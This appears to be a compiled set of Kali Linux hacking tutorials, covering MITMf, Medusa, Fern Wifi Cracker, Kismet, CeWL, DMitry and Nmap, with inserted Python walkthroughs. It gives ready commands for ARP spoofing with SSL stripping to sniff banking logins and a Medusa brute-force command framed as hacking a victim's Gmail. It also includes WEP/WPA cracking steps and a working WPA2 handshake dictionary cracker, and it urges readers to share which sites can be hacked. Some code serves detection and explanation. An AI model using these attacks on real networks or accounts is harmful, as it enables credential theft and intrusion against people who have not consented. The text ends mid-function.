Sniffing Passwords with MITMf

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins; it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running and the changes are passed down through the framework, so you can tweak the settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Follow the project's installation instructions to install MITMf on your Kali machine, then run mitmf -h to see its options.

Type this command (change the interface and the gateway address to match your network; you can find your gateway with route -n or ip route):

  • mitmf -i wlan0 --spoof --arp --hsts --dns --gateway 192.168.1.1

--spoof loads the spoofing plugin, --arp poisons the ARP caches of the victims and the gateway so their traffic passes through your machine, --dns answers DNS queries from MITMf's own DNS server, and --hsts enables the SSLstrip+ partial HSTS bypass. Run it as root.

Press enter to see the magic of mitmf in front of your eyes.

Information keeps on flowing. Oops HSTS is bypassed…

The userid I entered.

The password.

I tested it on an SSL-enabled banking page using my mobile phone, but look, I'm still able to sniff the traffic in plain text. I couldn't make it work on Facebook, Gmail and Yahoo, but I think there are a lot of secured websites out there that you can still hack with the tool. So test it for yourself and comment below the websites that work with MITMf. Good luck with your sniffing test!
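Why the bypass is only "partial" is easiest to see in code. The following is an added example, not MITMf's own code: it models what the SSLstrip+ proxy relies on. The proxy rewrites HTTPS links to HTTP and changes the hostname (the rewrite rule used here, prefixing an extra "w", is an assumption standing in for sslstrip+'s real rules) while MITMf's DNS server resolves the fake name. The downgrade fails when the browser already holds an HSTS policy that covers the fake name, typically a preloaded policy with includeSubDomains on the parent domain, which is why the big webmail and social sites resist it. The hostnames and policies below are constructed for the example.

```python
# Added example (not MITMf code): decide whether an sslstrip+-style
# downgrade can work against a given site, from the browser's HSTS state.
import re


def parse_hsts(header):
    """Parse a Strict-Transport-Security header value into a policy dict."""
    policy = {"max_age": 0, "include_subdomains": False, "preload": False}
    for directive in header.split(";"):
        d = directive.strip().lower()
        m = re.fullmatch(r'max-age="?(\d+)"?', d)
        if m:
            policy["max_age"] = int(m.group(1))
        elif d == "includesubdomains":
            policy["include_subdomains"] = True
        elif d == "preload":
            policy["preload"] = True
    return policy


def hsts_covers(policy_host, policy, host):
    """True if a policy the browser stored for policy_host applies to host."""
    if policy["max_age"] <= 0:
        return False
    if host == policy_host:
        return True
    return policy["include_subdomains"] and host.endswith("." + policy_host)


def strip_hostname(host):
    """Assumed sslstrip+-style rewrite: www.x -> wwww.x, otherwise prefix wwww."""
    if host.startswith("www."):
        return "w" + host
    return "wwww." + host


def downgrade_possible(target, known_policies):
    """known_policies: {host: policy} already in the browser (preload list plus
    cached headers). Returns (possible, reason)."""
    fake = strip_hostname(target)
    for phost, pol in known_policies.items():
        if hsts_covers(phost, pol, fake):
            return False, f"{fake} is covered by HSTS on {phost}"
    if any(hsts_covers(phost, pol, target) for phost, pol in known_policies.items()):
        return True, f"{target} has HSTS but {fake} does not; the rewrite evades it"
    return True, f"no HSTS policy known for {target}"


# Constructed browser state: one preloaded apex domain with includeSubDomains,
# one site that set HSTS only on its www host, and a site without any policy.
BROWSER_STATE = {
    "bigmail.example": parse_hsts("max-age=31536000; includeSubDomains; preload"),
    "www.bank.example": parse_hsts("max-age=31536000"),
}

if __name__ == "__main__":
    for site in ("www.bigmail.example", "www.bank.example", "www.shop.example"):
        print(site, downgrade_possible(site, BROWSER_STATE))
```

The first visit to a non-preloaded site is the other gap: a browser that has never received the header has no policy to enforce, and the proxy never lets the header through.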

Finding Admin Pages isn’t hard with Parsero

When I was starting out hacking websites I had a hard time finding the administrator pages, and I wasted so much time finding them manually by appending robots.txt to the site URL. But here's a tool that makes finding the login page easy once you have the credentials.

Parsero isn't installed by default in Kali, so install it first from the Kali repository (apt-get install parsero) before going on.

Let's first look at the options of the tool after installing: parsero -h lists them, and they are self-explanatory.

Look at the output! Parsero fetches the site's robots.txt, lists every Disallow entry and then requests each one to report its HTTP status code, so the listing clearly shows which of the site's "hidden" pages actually exist, and the admin page is among them. Good luck!
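What Parsero automates, as an added example that is not Parsero's own code: parse robots.txt into its Disallow entries, turn them into absolute URLs and check each one. The robots.txt text and the status lookup below are constructed so the example runs offline; swap check_status for a real HTTP request to audit a live site.

```python
# Added example (not Parsero code): robots.txt Disallow entries as a
# discovery source for hidden pages, with a status check per entry.
from urllib.parse import urljoin


def parse_robots(text):
    """Return [(agent, path)] for every non-empty Disallow line.
    Consecutive User-agent lines form one group; comments are stripped."""
    entries, group, in_agent_run = [], [], False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        field, value = (s.strip() for s in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if not in_agent_run:          # a new group starts after any rule line
                group = []
            group.append(value)
            in_agent_run = True
            continue
        in_agent_run = False
        if field == "disallow" and value:
            for agent in (group or ["*"]):
                entries.append((agent, value))
    return entries


def disallowed_urls(base, text):
    """Unique absolute URLs for every Disallow path, in file order."""
    seen, urls = set(), []
    for _, path in parse_robots(text):
        url = urljoin(base, path)
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


def audit(base, text, check_status):
    """[(url, status)] for each Disallow entry; check_status(url) -> int."""
    return [(u, check_status(u)) for u in disallowed_urls(base, text)]


def existing_pages(base, text, check_status):
    """Only the entries that answer with something other than 404."""
    return [u for u, code in audit(base, text, check_status) if code != 404]


# Constructed robots.txt for the example.
ROBOTS_TXT = """# constructed sample
User-agent: *
Disallow: /admin/
Disallow: /wp-login.php
Disallow: /backup/   # old dumps
Disallow:
Allow: /public/

User-agent: Googlebot
User-agent: Bingbot
Disallow: /staging/
"""

# Constructed stand-in for real HTTP responses (unknown URLs answer 404).
FAKE_STATUS = {
    "http://www.example.com/admin/": 200,
    "http://www.example.com/wp-login.php": 200,
    "http://www.example.com/backup/": 403,
}


def fake_check(url):
    return FAKE_STATUS.get(url, 404)


if __name__ == "__main__":
    for url, code in audit("http://www.example.com/", ROBOTS_TXT, fake_check):
        print(code, url)
```

A 403 is as interesting as a 200: the path exists, the server just does not want you there.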

Hacking Gmail Accounts with Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible. The author considers following items as some of the key features of this application.

  • Thread-based parallel testing. Brute-force testing can be performed against multiple hosts, users or passwords concurrently.
  • Flexible user input. Target information (host/user/password) can be specified in a variety of ways. For example, each item can be either a single entry or a file containing multiple entries. Additionally, a combination file format allows the user to refine their target listing.
  • Modular design. Each service module exists as an independent .mod file. This means that no modifications are necessary to the core application in order to extend the supported list of services for brute-forcing.

Type medusa -h

As with any hacking tool, let's first look at the options we can use. Now that we know the options, what's next?

  • medusa -h smtp.gmail.com -u johndoe@gmail.com -P /wordlist/location -s -M smtp

-h (target hostname or IP), -u (the victim's username), -P (file containing the wordlist), -s (enable SSL), -M (module name). After specifying your target details, what are you waiting for? Press Enter.

To make this demo fast, because I hate wasting your time, I only used 16 passwords to be tested against the account. As shown on the screen it successfully found my Gmail password. I also tested Medusa against Yahoo but it failed: after a few tries it gets blocked.
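The block-after-a-few-tries behaviour is the defender's side of this attack, so here is an added example (not Medusa's code) of what a Medusa smtp run looks like from the mail server. Each candidate password is an AUTH attempt; each failure is a log line, and counting failures per source address is enough to spot the brute force. The log lines are constructed in Postfix's smtpd format, and the AUTH PLAIN helpers show what a captured credential blob on the wire actually contains.

```python
# Added example (not Medusa code): detect an SMTP AUTH brute force from
# constructed Postfix log lines, and encode/decode SASL PLAIN blobs.
import base64
import re
from collections import defaultdict

# Postfix: "... postfix/smtpd[PID]: warning: HOST[IP]: SASL MECH authentication failed: ..."
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) \S+ postfix/smtpd\[\d+\]: warning: "
    r"(?P<host>\S+)\[(?P<ip>[\d.]+)\]: SASL (?P<mech>\w+) authentication failed"
)


def failed_auths(lines):
    """Count failed SASL authentications per source IP."""
    counts = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            counts[m.group("ip")] += 1
    return dict(counts)


def brute_force_sources(lines, threshold=5):
    """IPs with at least `threshold` failures: candidates for a block rule."""
    return sorted(ip for ip, n in failed_auths(lines).items() if n >= threshold)


def encode_auth_plain(user, password, authzid=""):
    """SASL PLAIN: base64(authzid NUL authcid NUL password), what a client sends."""
    return base64.b64encode(f"{authzid}\0{user}\0{password}".encode()).decode()


def decode_auth_plain(blob):
    """Recover (user, password) from a sniffed AUTH PLAIN blob."""
    _authzid, user, password = base64.b64decode(blob).decode().split("\0")
    return user, password


def _fail(ts, host, ip, mech="LOGIN"):
    return (f"{ts} mail postfix/smtpd[2241]: warning: {host}[{ip}]: "
            f"SASL {mech} authentication failed: authentication failure")


# Constructed sample log: one source hammering AUTH, one ordinary typo.
LOG_LINES = [
    "Sep 13 21:46:30 mail postfix/smtpd[2241]: connect from unknown[203.0.113.5]",
    *[_fail(f"Sep 13 21:46:{31 + i:02d}", "unknown", "203.0.113.5") for i in range(6)],
    "Sep 13 21:46:40 mail postfix/smtpd[2241]: disconnect from unknown[203.0.113.5]",
    _fail("Sep 13 21:50:02", "laptop.lan", "198.51.100.7", "PLAIN"),
]

if __name__ == "__main__":
    print(failed_auths(LOG_LINES))
    print("block:", brute_force_sources(LOG_LINES))
    print(decode_auth_plain(encode_auth_plain("johndoe@gmail.com", "hunter2")))
```

Without TLS (the -s flag above) the AUTH PLAIN blob crosses the wire as plain base64, which is why the sniffing sections of this page can pick SMTP credentials up.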

Find Hidden Network with Kismet

In Kali there are a few tools to find hidden networks (SSIDs). For example airodump-ng from the aircrack-ng suite lists a hidden SSID only as <length: N>; the full network name stays hidden unless you deauthenticate a connected client, because the name is sent in the clear in the probe and association frames when it reconnects. The easiest way to find hidden networks is a tool called Kismet. Enter kismet -h to show the options, then type kismet -c wlan1 (use your own wireless interface, e.g. wlan0).

Kismet will ask you if you want to start the server choose Yes

There you go the hidden network was detected!

To see more details on the network, just click it. The point here is that hiding your network is a pretty useless option: the SSID is never encrypted, it is only left out of the beacon frames, and every client that connects sends it in the clear.
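The correlation Kismet does, as an added example that is not Kismet's code: parse 802.11 management frames, flag beacons whose SSID element is empty or null-padded (the two ways APs "hide" a network), and fill the name in from a probe response or association request carrying the same BSSID. The frames are constructed in memory with the standard management-frame layout (24-byte header, 12 bytes of fixed parameters for beacons and probe responses, 4 for association requests, then tagged elements), so it runs without a wireless card.

```python
# Added example (not Kismet code): resolve hidden SSIDs by correlating
# management frames per BSSID. Frames below are constructed.
import struct

MGMT_SUBTYPE = {8: "beacon", 5: "probe-resp", 4: "probe-req", 0: "assoc-req"}


def ie(tag, data):
    """One tagged element: id, length, payload."""
    return bytes([tag, len(data)]) + data


def mgmt_frame(subtype, da, sa, bssid, body):
    """Build a management frame (type 0) with the given subtype and body."""
    fc = bytes([(subtype << 4) | 0x00, 0x00])
    return fc + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body


def parse_ies(data):
    """Tagged elements as {id: payload}; first occurrence wins."""
    ies, i = {}, 0
    while i + 2 <= len(data):
        tag, ln = data[i], data[i + 1]
        ies.setdefault(tag, data[i + 2:i + 2 + ln])
        i += 2 + ln
    return ies


def parse_mgmt(frame):
    """Return subtype, BSSID, SSID and hidden flag, or None for non-management frames."""
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0:            # frame type 0 = management
        return None
    subtype = fc0 >> 4
    bssid = frame[16:22]                 # addr3 carries the BSSID in these subtypes
    body = frame[24:]
    if subtype in (8, 5):                # beacon / probe response: timestamp, interval, capabilities
        body = body[12:]
    elif subtype == 0:                   # association request: capabilities, listen interval
        body = body[4:]
    ssid = parse_ies(body).get(0)
    hidden = ssid is not None and (len(ssid) == 0 or set(ssid) == {0})
    return {
        "subtype": MGMT_SUBTYPE.get(subtype, subtype),
        "bssid": bssid.hex(":"),
        "ssid": None if (hidden or ssid is None) else ssid.decode(errors="replace"),
        "hidden": hidden,
    }


def resolve_hidden(frames):
    """{bssid: name or None} for every BSSID whose beacons hide the SSID."""
    hidden, names = set(), {}
    for f in frames:
        p = parse_mgmt(f)
        if not p:
            continue
        if p["subtype"] == "beacon" and p["hidden"]:
            hidden.add(p["bssid"])
        elif p["ssid"] and p["subtype"] in ("probe-resp", "assoc-req"):
            names[p["bssid"]] = p["ssid"]
    return {b: names.get(b) for b in hidden}


# Constructed capture: hidden AP, a client that probes and then associates.
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("66778899aabb")
BCAST = b"\xff" * 6
FIXED = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411)   # timestamp, interval, capabilities
RATES = ie(1, bytes([0x82, 0x84, 0x8B, 0x96]))
FRAMES = [
    mgmt_frame(8, BCAST, AP, AP, FIXED + ie(0, b"") + RATES),            # beacon, empty SSID
    mgmt_frame(8, BCAST, AP, AP, FIXED + ie(0, b"\x00" * 7) + RATES),    # beacon, null-padded SSID
    mgmt_frame(5, STA, AP, AP, FIXED + ie(0, b"HomeNet") + RATES),       # probe response reveals it
    mgmt_frame(0, AP, STA, AP, struct.pack("<HH", 0x0411, 10) + ie(0, b"HomeNet") + RATES),
]

if __name__ == "__main__":
    print(resolve_hidden(FRAMES))
```

With only the beacons (the first two frames) the BSSID is reported with no name; a single probe response or association from any client is enough to fill it in, which is exactly what a deauthentication forces.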

Crack WEP using Fern Wifi Cracker

In my previous tutorial I showed how to crack a WPA password; now let's downgrade to cracking WEP, which is less secure and easier to crack than WPA, easier than eating popcorn. In cracking a WEP key you don't need a wordlist: the attack depends on the initialization vectors (IVs) you've captured, and once enough of them are collected the tool recovers the key statistically on its own. Fire up Fern Cracker once again, you goddamn bastard!

  1. Choose the wireless card (ex. wlan0, wlan1, eth0)
  2. Scan for wireless APs nearby
  3. When there are WEP APs available the WEP button will be enabled; just click the button and it will open the attack panel.

This panel shows useful information on the router: channel, ESSID, BSSID. Click your target router, tick Regular Attack, and on the upper right click Wifi Attack. When everything goes smoothly you'll see the number of captured IVs increasing as in the picture above. Note that the rate of IVs depends on how busy the connected devices are: the IVs come from the frames they send, so if they are connected but not browsing anything the attack will be very slow (the ARP request replay Fern uses speeds this up by re-injecting captured ARP frames so the AP answers with fresh IVs).

27133 IVs and counting, and still no WEP key, but patience is a virtue. You can leave it running and watch your favourite TV show.

Alas! The WEP key! A 26-hex-digit key (104-bit WEP) that you can enter as the password directly; if the network was configured with an ASCII passphrase, converting the hex to ASCII with any hex-to-ASCII converter shows it. To sum up, if you're still using WEP, change to the more secure WPA2. There's another tool that can crack WEP, wifite, that I will use in my upcoming tutorials.
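Why IVs are all that matters: WEP prepends a 24-bit IV to the shared key and feeds the result to RC4, so there are only 2^24 keystreams per key and a busy network repeats them within hours. Two frames under the same IV share a keystream, and XORing the two ciphertexts cancels it, which lets an attacker read one frame from the other with no key at all; the statistical attacks Fern runs (FMS/PTW) go further and recover the key itself from the IVs. The following is an added example, not Fern's or aircrack-ng's code: a small RC4 and WEP encryptor plus the keystream-reuse recovery. Key, IV and frame contents are constructed.

```python
# Added example (not Fern code): WEP framing with RC4 and the effect of
# IV reuse. All values below are constructed for the demonstration.
import struct
import zlib


def rc4(key, length):
    """RC4 keystream of `length` bytes for `key` (KSA then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key, iv, plaintext):
    """WEP body: 3-byte IV || key-id byte || RC4(IV||key) over (data || CRC32 ICV)."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    payload = plaintext + struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    ks = rc4(iv + key, len(payload))
    return iv + b"\x00" + bytes(a ^ b for a, b in zip(payload, ks))


def wep_decrypt(key, frame):
    """Decrypt with the key; None when the ICV does not verify."""
    iv, body = frame[:3], frame[4:]
    ks = rc4(iv + key, len(body))
    payload = bytes(a ^ b for a, b in zip(body, ks))
    data, icv = payload[:-4], payload[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        return None
    return data


def recover_with_keystream_reuse(frame_known, known_plain, frame_unknown):
    """Two frames with the same IV share a keystream: C1 xor P1 gives the
    keystream, which then strips C2. No key needed. A known plaintext is
    realistic: ARP and IP frames start with a fixed LLC/SNAP header."""
    assert frame_known[:3] == frame_unknown[:3], "different IVs, no reuse"
    ks = bytes(c ^ p for c, p in zip(frame_known[4:], known_plain))
    return bytes(c ^ k for c, k in zip(frame_unknown[4:], ks))


def iv_space():
    """Number of distinct IVs per key: reuse is inevitable on a busy network."""
    return 1 << 24


# Constructed 104-bit key and two frames the AP sent under the same IV.
KEY = bytes.fromhex("0123456789abcdef0011223344")
IV = bytes.fromhex("0a0b0c")
LLC_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06"   # LLC/SNAP header, EtherType ARP
LLC_IP = b"\xaa\xaa\x03\x00\x00\x00\x08\x00"    # LLC/SNAP header, EtherType IPv4
P1 = LLC_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x01" + b"\x11" * 8   # an ARP request (24 bytes)
P2 = LLC_IP + b"GET /login?p=pw1"                                  # an IP payload (24 bytes)
FRAME1 = wep_encrypt(KEY, IV, P1)
FRAME2 = wep_encrypt(KEY, IV, P2)

if __name__ == "__main__":
    print(recover_with_keystream_reuse(FRAME1, P1, FRAME2))
    print("IV space:", iv_space())
```

The ICV is CRC32, not a MAC, so it detects transmission errors but not tampering; that property is what the chop-chop and fragmentation attacks in Fern's feature list exploit.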

Fern Wifi Cracker – Automated WPA Password Cracking

Fern Wifi Cracker is a Wireless security auditing and attack software program written using the Python Programming Language and the Python QT Gui Library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.

Fern Wifi Cracker currently supports the following features:

  • WEP Cracking with Fragmentation, Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
  • WPA/WPA2 Cracking with Dictionary or WPS based attacks
  • Automatic saving of key in database on successful crack
  • Automatic Access Point Attack System
  • Session Hijacking (Passive and Ethernet Modes)
  • Access Point MAC Address Geo Location Tracking
  • Internal MITM Engine
  • Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
  • Update Support

First step, make sure your card is capable of packet injection (check the aircrack-ng compatibility list for supported cards). If not, there's no need to follow the instructions below: you'll never crack any wifi password without a card that supports monitor mode and injection. Then check your card's interface: type airmon-ng; mine is wlan1 with the ath9k driver. Finally, kill the processes that can interfere with your card's driver: type airmon-ng check kill.

Run Fern Wifi Cracker and choose the wifi card from the drop-down; it will automatically put the card in monitor mode. See the green text Monitor mode enabled on wlan1mon.

Next click Scan for Access Points to look for target APs. If it detects WEP networks the WEP button is highlighted, otherwise the WPA button; in my case a WPA access point was detected. Now just click the WPA button to open the attack panel where you'll fulfil your dream of being a wifi hacker.

Select your target access point, tick Regular Attack or WPS Attack (for WPS-enabled routers), browse to the wordlist to be used for password cracking, then click Wifi Attack and the tool will do everything for you as if you had a magic wand.

All wifi cracking tools follow these steps: deauthenticate connected clients, capture the four-way handshake when they reconnect, and test each wordlist entry against the handshake. Here's the catch: if your wordlist contains the passphrase you get it, if not you don't, and there is no shortcut. Each guess costs 4096 rounds of PBKDF2-HMAC-SHA1, so exhaustive brute force of anything beyond short passphrases is out of reach; a faster machine or GPU cracker with rules and masks extends what a wordlist covers, but it is still a guessing game. The time to crack WPA/WPA2 depends on how big your wordlist is and your luck, unlike cracking WEP, which depends on the IVs captured.

That's it, the WPA password! There are a lot of tools in Linux that can crack WPA/WPA2, but Fern Cracker is the easiest to use, thanks to its user-friendly GUI.
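What "crack the password against your wordlist" means in practice, as an added example that is not Fern's or aircrack-ng's code. From the captured handshake the cracker knows both MAC addresses, both nonces and the MIC of an EAPOL-Key message; for every candidate passphrase it derives the PMK with PBKDF2 (4096 rounds, the SSID as salt), expands the PTK, and checks whether the first 16 bytes (the KCK) reproduce the captured MIC. The MAC addresses, nonces and the EAPOL message below are constructed, and the example assumes key-descriptor version 2 (HMAC-SHA1 MIC, the WPA2/AES case).

```python
# Added example (not Fern code): WPA2-PSK dictionary attack against a
# constructed four-way-handshake capture.
import hashlib
import hmac


def pmk(passphrase, ssid):
    """Pairwise Master Key: PBKDF2-HMAC-SHA1, 4096 rounds, SSID as salt."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk(pmk_, aa, spa, anonce, snonce):
    """PRF-512 expansion of the PMK with both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def mic(kck, eapol_zeroed):
    """Key-descriptor version 2: HMAC-SHA1 over the EAPOL frame with the MIC
    field zeroed, truncated to 16 bytes (assumed version for this example)."""
    return hmac.new(kck, eapol_zeroed, hashlib.sha1).digest()[:16]


def crack(ssid, aa, spa, anonce, snonce, eapol_zeroed, captured_mic, wordlist):
    """Return the first candidate whose derived KCK reproduces the captured MIC."""
    for candidate in wordlist:
        kck = ptk(pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(mic(kck, eapol_zeroed), captured_mic):
            return candidate
    return None


# Constructed capture: AP and client MACs, nonces, and a stand-in for
# EAPOL-Key message 2 with its 16-byte MIC field zeroed.
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")
SPA = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_ZEROED = (bytes.fromhex("0103007502010a00000000000000000001") + SNONCE
                + b"\x00" * 16 + b"\x00" * 40)


def make_capture(passphrase):
    """What the sniffer would have recorded if the network used `passphrase`."""
    kck = ptk(pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return mic(kck, EAPOL_ZEROED)


CAPTURED_MIC = make_capture("correcthorse")     # constructed: the real passphrase
WORDLIST = ["password", "12345678", "homenet1", "correcthorse", "letmein99"]

if __name__ == "__main__":
    print(crack(SSID, AA, SPA, ANONCE, SNONCE, EAPOL_ZEROED, CAPTURED_MIC, WORDLIST))
```

Every candidate costs a full PBKDF2 derivation before the cheap MIC comparison, and the PMK is bound to the SSID, so rainbow tables only help for common network names.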

DMitry – Deepmagic Information Gathering Tool

DMitry (Deepmagic Information Gathering Tool) is a UNIX/(GNU)Linux Command Line Application coded in C. DMitry has the ability to gather as much information as possible about a host. Base functionality is able to gather possible subdomains, email addresses, uptime information, tcp port scan, whois lookups, and more.

The following is a list of the current features:

  • An Open Source Project.
  • Perform an Internet Number whois lookup.
  • Retrieve possible uptime data, system and server data.
  • Perform a SubDomain search on a target host.
  • Perform an E-Mail address search on a target host.
  • Perform a TCP Portscan on the host target.
  • A Modular program allowing user specified modules

Source: http://mor-pah.net/software/dmitry-deepmagic-information-gathering-tool/

Installing the tool is not a problem: DMitry is preinstalled in Kali Rolling. Just type dmitry -h to see the options you can use against your target website.

Type dmitry -isep example.com (-i whois lookup on the host's IP, -s subdomain search, -e email address search, -p TCP port scan). I only use the basic options; if you want to gather more information type dmitry -winsep example.com, which adds -w (whois on the domain name) and -n (Netcraft information).

Valuable info on your target website just keep on flowing…

And flowing... The last part usually includes the emails gathered and the ports scanned. There you go, a vast amount of information you can use in your future attacks on the target host. Note that the subdomain and email searches query public search engines, so what you get depends on what those engines still return.

CeWL – Custom Wordlist Generator

CeWL, the Custom Word List generator. CeWL is a ruby app which spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command line app, FAB (Files Already Bagged) which uses the same meta data extraction techniques to create author/creator lists from already downloaded files.

Type cewl -h for help

  • cewl -v -m 8 -w /root/Desktop/cewl.txt example.com

-v verbose, -m the minimum word length to keep, -w write the output to a file, followed by the website CeWL will crawl (by default it spiders to depth 2 and stays on the site). Grab a coffee or beer because this will take some time, depending on how big your target website is.

After the scan finishes, to know how many words were added to the file, type wc -l /root/Desktop/cewl.txt: CeWL writes one word per line, so the line count is the word count. As you can see, 548 words were added to my wordlist. What now? You can feed it to aircrack-ng, Pyrit or John the Ripper, because most of the time admins use usernames and passwords that you can easily find on their websites.
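The extraction step both CeWL and DMitry rely on, as one added example serving the CeWL section here and the DMitry email/subdomain search above (it is neither tool's code): strip markup and scripts from a fetched page, keep every word of at least the minimum length ordered by frequency (what cewl -m 8 writes), and pull out email addresses and hostnames under the target domain. The HTML page is constructed; a real run would feed it pages fetched while spidering.

```python
# Added example (not CeWL or DMitry code): wordlist, email and subdomain
# harvesting from one constructed HTML page.
import re
from html.parser import HTMLParser


class _Extractor(HTMLParser):
    """Collect visible text and link targets, skipping script/style bodies."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        for name, value in attrs:
            if value and name in ("href", "src"):
                self.links.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def extract(html):
    ex = _Extractor()
    ex.feed(html)
    return " ".join(ex.text), " ".join(ex.links)


WORD_RE = re.compile(r"[A-Za-z0-9]+")          # split on anything non-alphanumeric
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def words(html, min_len=8):
    """Candidate passwords: visible words >= min_len, most frequent first."""
    text, _ = extract(html)
    counts = {}
    for w in WORD_RE.findall(text):
        if len(w) >= min_len:
            counts[w] = counts.get(w, 0) + 1
    return sorted(counts, key=lambda w: (-counts[w], w))


def emails(html):
    """Addresses from visible text and mailto: links."""
    text, links = extract(html)
    return sorted(set(EMAIL_RE.findall(text + " " + links)))


def subdomains(html, domain):
    """Hostnames under `domain` anywhere in the raw page (text, links, scripts)."""
    pat = re.compile(r"\b((?:[\w-]+\.)+" + re.escape(domain) + r")\b", re.I)
    return sorted({m.lower() for m in pat.findall(html)})


# Constructed page for the example.
HTML = """<html><head><title>Acme Corp - Internal Portal</title>
<meta name="author" content="Jonathan Baxter"></head><body>
<script>var internalToken = "abcdefgh";</script>
<h1>Welcome to Acme Corporation</h1>
<p>Contact <a href="mailto:j.baxter@acme.example">Jonathan Baxter</a> or
webmaster@acme.example. Our intranet lives at https://intranet.acme.example/login
and mail is handled by mail.acme.example.</p>
<p>Acme Corporation was founded in 1999. Corporation employees use the portal daily.</p>
</body></html>"""

if __name__ == "__main__":
    print(words(HTML))
    print(emails(HTML))
    print(subdomains(HTML, "acme.example"))
```

CeWL proper also reads author names out of document metadata (the -a/-e options and FAB), which is where "Jonathan Baxter" in the meta tag above would end up; that path is left out here.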

Screenshot from 2016-02-24 21:14:11

Nmap Reconnaissance

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

I’m going to show how to scan your own network using Nmap with these simple steps. Take note that Nmap is already installed in Kali all you need is type the following to list all commands.

  • nmap -h

Let's scan first with -v (verbose mode) to gather information about the target; by default Nmap probes the 1000 most common TCP ports, so you can clearly see the open ports and, on a local network, the MAC address of the router. You can insert your target's IP address or hostname, e.g. nmap -v 192.168.1.1 or nmap -v example.com.

  • nmap -v 192.168.1.1

The second scan, -A, enables OS detection, version detection, script scanning and traceroute. Here you can see a lot of information about the target: OS details, the traceroute, even the router's admin page was picked up by the http scripts.

  • nmap -A 192.168.1.1

The scan to see the open ports of the router (--open only filters the output down to ports in the open state; it does not change what is scanned), and there are my router's open ports, 4 in all.

  • nmap --open 192.168.1.1

And to see the connected devices in the network, run a ping scan of the whole subnet (-sn; -sP is the old name for the same option and still works):

  • nmap -sn 192.168.1.1/24

Now you've seen how simple Nmap commands can find important information on your target network. Try all the commands against your own network, not your neighbour's. Happy Hacking!
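Reading these results by eye stops scaling past one router. Nmap's grepable output (-oG) is the format meant for scripts, so here is an added example, not part of Nmap or of the original page, that parses it into live hosts and open ports per host. The scan output below is constructed in the -oG layout (one Host: line per host, tab-separated fields, ports as port/state/protocol/owner/service/rpc/version/); run something like nmap --open -oG scan.gnmap 192.168.1.0/24 and feed the file to parse_grepable to use it for real.

```python
# Added example (not Nmap code): parse nmap -oG output. Sample is constructed.
import re

HOST_RE = re.compile(r"Host: (\S+) \(([^)]*)\)\s+(.*)")


def parse_grepable(text):
    """{ip: {"hostname", "up", "ports": [{port, state, proto, service, version}]}}"""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                      # comments and "Nmap done" lines
        ip, name, rest = m.groups()
        entry = hosts.setdefault(ip, {"hostname": name, "up": False, "ports": []})
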